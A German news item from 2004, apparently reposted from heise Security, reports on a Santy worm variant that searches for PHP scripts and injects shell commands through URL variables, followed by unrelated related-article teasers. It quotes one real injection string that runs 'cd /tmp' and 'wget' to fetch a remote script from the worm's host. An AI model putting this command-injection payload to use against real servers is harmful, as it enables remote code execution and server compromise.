Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Ratings
Here you can write a comment
Related topics
Zend PHP5 Contest
Der PHP 5 Coding Contest, der von Zend Technologies ausgerichtet wird, hat gestartet. Entwickler können bis zum 19. September aus sechs Aufgabenstellungen wählen, die in PHP 5 zu programmieren sind, und zwar ein Gallery-System, ein Online-Präsentationssys ...

Autor :
admin
Category:
Software & Web-Development
Welcher Webhoster passt zu meinen Bedürfnissen?
Kein Zweifel, der Markt an Anbietern für Webhosting ist unüberschaubar groß. Was sollte man beachten. ...

Autor :
admin
Category:
Software & Web-Development
Skandal von freecity.de
Seit einigen Wochen sind die Internetseiten und Online-Community's welche bei one2one gehostet sind in Gefahr. Es liegt nicht an one2one, sondern an einem anderen Provider Namens freecity (http://www.freecity.de) und der Tochterfirma kontent (http://www.k ...

Autor :
admin
Category:
Software & Web-Development
WannaCry stoppen & entfernen
mobilegeeks.de hat eine kurz Anleitung erstellt, wir Ihr Eure infizierten Windows-PCs evtl. wieder zu laufen bekommt. ...

Autor :
admin
Category:
Software & Web-Development
NuSphere PhpED 4.0 jetzt verfügbar
PhpED unterstützt den Programmierer auf allen Etappen des Softwareentwick-lungsprozesses, darunter beim Debugging des Codes, Uploaden der Projekte auf Server via FTP, SFTP und WebDAV sowie beim Integrieren mit repositorybasierten Versionsverwaltungssystem ...

Autor :
admin
Category:
Software & Web-Development
Source-Code-Verwaltung Subversion 1.3 veröffentlicht
Im Zuge eines Updates der Versionsverwaltung Subversion auf 1.3 haben die Entwickler mehr als 30 Fehler bereinigt und einige neue Features eingebaut. Die Open-Source-Software besteht aus einer Sammlung von Bibliotheken, die ein eigenständiger Serverprozes ...

Autor :
admin
Category:
Software & Web-Development